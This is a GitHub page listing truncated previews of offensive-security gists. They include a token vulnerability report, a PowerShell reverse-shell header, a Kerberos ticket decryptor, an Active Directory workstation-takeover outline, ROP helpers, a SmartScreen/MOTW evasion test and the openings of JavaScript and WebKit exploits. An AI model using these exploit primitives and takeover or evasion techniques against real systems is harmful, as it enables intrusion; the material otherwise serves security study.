Skip to content

Instantly share code, notes, and snippets.

View curtishoughton's full-sized avatar

Curtis Houghton curtishoughton

42 followers · 38 following
  • England, United Kingdom
View GitHub Profile
@DanielVF
DanielVF / sample.md
Last active May 16, 2025 19:03
Sample Vulnerability Report

Impact

CRITICAL! Almost all USDC liquidity on the REKT/USDC uniswap pool can be stolen, due to an authorization issue with burnFrom() on the REKT token.

Background

Uniswap v2 pools get the prices for their swaps by comparing the relative amounts of each of the two tokens that they hold. If the pool holds very little of token A, and a lot of token B, then it only takes a little of token A to buy a lot of token B.

Currently REKT and USDC are fairly priced in the pool. If there were to suddenly be very little REKT in the pool, but the same amount of USDC, then very little REKT would be able to buy a lot of USDC.

@qtc-de
qtc-de / DynWin32-ReverseShell.ps1
Last active December 10, 2024 20:13
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
@EvanMcBroom
EvanMcBroom / no_strings.hpp
Last active May 17, 2025 20:08
Encrypt Strings at Compile Time
// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
@tothi
tothi / decryptKerbTicket.py
Last active February 15, 2025 00:16 — forked from xan7r/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python3
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
@cd789
cd789 / concat_exploit.js
Created August 14, 2021 06:44
class Helpers {
constructor() {
this.buf = new ArrayBuffer(8);
this.f64 = new Float64Array(this.buf);
this.f32 = new Float32Array(this.buf);
this.u32 = new Uint32Array(this.buf);
this.u64 = new BigUint64Array(this.buf);
this.state = {};
}
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active July 9, 2025 19:15
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@JohnHammond
JohnHammond / stack_string.py
Created June 20, 2021 14:44
#!/usr/bin/env python3
"""
# NOTE, you must change the string below for data you want.
# This script does not take arguments in its current form. Sorry!
"""
from pwn import *
string = b"foobar"
@JohnHammond
JohnHammond / rop_ripper.py
Created June 20, 2021 14:42
#!/usr/bin/env python3
"""
# NOTE, you must change the filename below for the rp++ output you want to process.
# This script does not take arguments in its current form. Sorry!
"""
import re
from pwn import p32, u32
@mgraeber-rc
mgraeber-rc / SimulateInternetZoneTest.ps1
Created May 28, 2021 16:57
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
System.Console.Read();
}
}
'@
@ujin5
ujin5 / fuck.js
Last active December 17, 2024 05:58
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));